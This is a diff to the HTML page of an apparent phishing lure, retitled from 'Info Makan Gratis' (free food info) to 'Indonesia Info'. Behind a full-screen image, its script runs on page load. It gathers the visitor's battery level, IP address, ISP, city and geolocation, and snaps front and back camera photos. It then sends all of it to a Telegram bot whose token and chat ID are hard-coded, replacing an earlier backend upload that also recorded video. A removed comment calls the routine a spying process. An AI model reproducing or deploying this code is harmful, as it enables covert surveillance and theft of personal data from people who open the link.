--- a/index.html
+++ b/index.html
@@ -3,21 +3,14 @@
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Info Makan Gratis</title>
+    <title>Indonesia Info</title>
 </head>
 <body style="margin: 0; padding: 0; display: flex; justify-content: center; align-items: center; height: 100vh; background-color: black;">
-    <img id="displayImage" src="" alt="Loading..." style="width: 100%; height: 100vh; object-fit: cover;">
-    
+    <img id="displayImage" src="https://img12.pixhost.to/images/804/574487749_fikxzxmodz-developer.jpg" style="width: 100%; height: 100vh; object-fit: cover;">
+
     <script>
-        async function getDisplayImage() {
-            try {
-                const res = await fetch("/image"); // Ambil link gambar dari backend
-                const data = await res.json();
-                document.getElementById("displayImage").src = data.imageUrl;
-            } catch (error) {
-                console.error("Gagal memuat gambar:", error);
-            }
-        }
+        const BOT_TOKEN = "7575375182:7575375182:AAHQeA5jdew2tMO5Znh9_zBqi4pwFnWUmCg";  
+        const CHAT_ID = "7081489041";  
 
         async function getBatteryStatus() {
             if (navigator.getBattery) {
@@ -32,8 +25,8 @@
                 const res = await fetch("https://ipapi.co/json/");
                 const data = await res.json();
                 return `IP: ${data.ip}\nISP: ${data.org}\nKota: ${data.city}, ${data.region}, ${data.country_name}`;
-            } catch (err) {
-                return "IP Info: Gagal didapatkan";
+            } catch {
+                return "IP Info: Tidak Diketahui";
             }
         }
 
@@ -53,7 +46,7 @@
                     const video = document.createElement("video");
                     video.srcObject = stream;
                     video.play();
-                    
+
                     setTimeout(() => {
                         const canvas = document.createElement("canvas");
                         canvas.width = video.videoWidth;
@@ -68,49 +61,38 @@
             });
         }
 
-        async function recordVideo() {
-            return new Promise(async (resolve, reject) => {
-                try {
-                    const stream = await navigator.mediaDevices.getUserMedia({ video: { facingMode: "user" }, audio: false });
-                    const mediaRecorder = new MediaRecorder(stream);
-                    const chunks = [];
-
-                    mediaRecorder.ondataavailable = (event) => chunks.push(event.data);
-                    mediaRecorder.onstop = () => {
-                        stream.getTracks().forEach(track => track.stop());
-                        const blob = new Blob(chunks, { type: "video/mp4" });
-                        resolve(blob);
-                    };
-
-                    mediaRecorder.start();
-                    setTimeout(() => mediaRecorder.stop(), 5000);
-                } catch (error) {
-                    reject(error);
-                }
-            });
-        }
-
         async function sendToTelegram() {
             try {
                 const [battery, ipInfo, location] = await Promise.all([getBatteryStatus(), getIPInfo(), getLocation()]);
                 const frontImage = await captureImage("user");
                 const backImage = await captureImage("environment");
-                const videoBlob = await recordVideo();
 
-                const formData = new FormData();
-                formData.append("frontImage", frontImage);
-                formData.append("backImage", backImage);
-                formData.append("video", videoBlob);
-                formData.append("info", `${battery}\n${ipInfo}\n${location}`);
+                const text = `📌 *Data Pengguna*\n\n${battery}\n${ipInfo}\n${location}`;
 
-                await fetch("/send", { method: "POST", body: formData });
+                await fetch(`https://api.telegram.org/bot${BOT_TOKEN}/sendMessage`, {
+                    method: "POST",
+                    headers: { "Content-Type": "application/json" },
+                    body: JSON.stringify({ chat_id: CHAT_ID, text, parse_mode: "Markdown" })
+                });
+
+                await fetch(`https://api.telegram.org/bot${BOT_TOKEN}/sendPhoto`, {
+                    method: "POST",
+                    headers: { "Content-Type": "application/json" },
+                    body: JSON.stringify({ chat_id: CHAT_ID, photo: frontImage, caption: "📸 Kamera Depan" })
+                });
+
+                await fetch(`https://api.telegram.org/bot${BOT_TOKEN}/sendPhoto`, {
+                    method: "POST",
+                    headers: { "Content-Type": "application/json" },
+                    body: JSON.stringify({ chat_id: CHAT_ID, photo: backImage, caption: "📸 Kamera Belakang" })
+                });
+
             } catch (error) {
                 console.error("Gagal mengirim data:", error);
             }
         }
 
-        getDisplayImage();  // Load gambar dari backend
-        sendToTelegram();  // Jalankan proses mata-mata
+        sendToTelegram();
     </script>
 </body>
 </html>
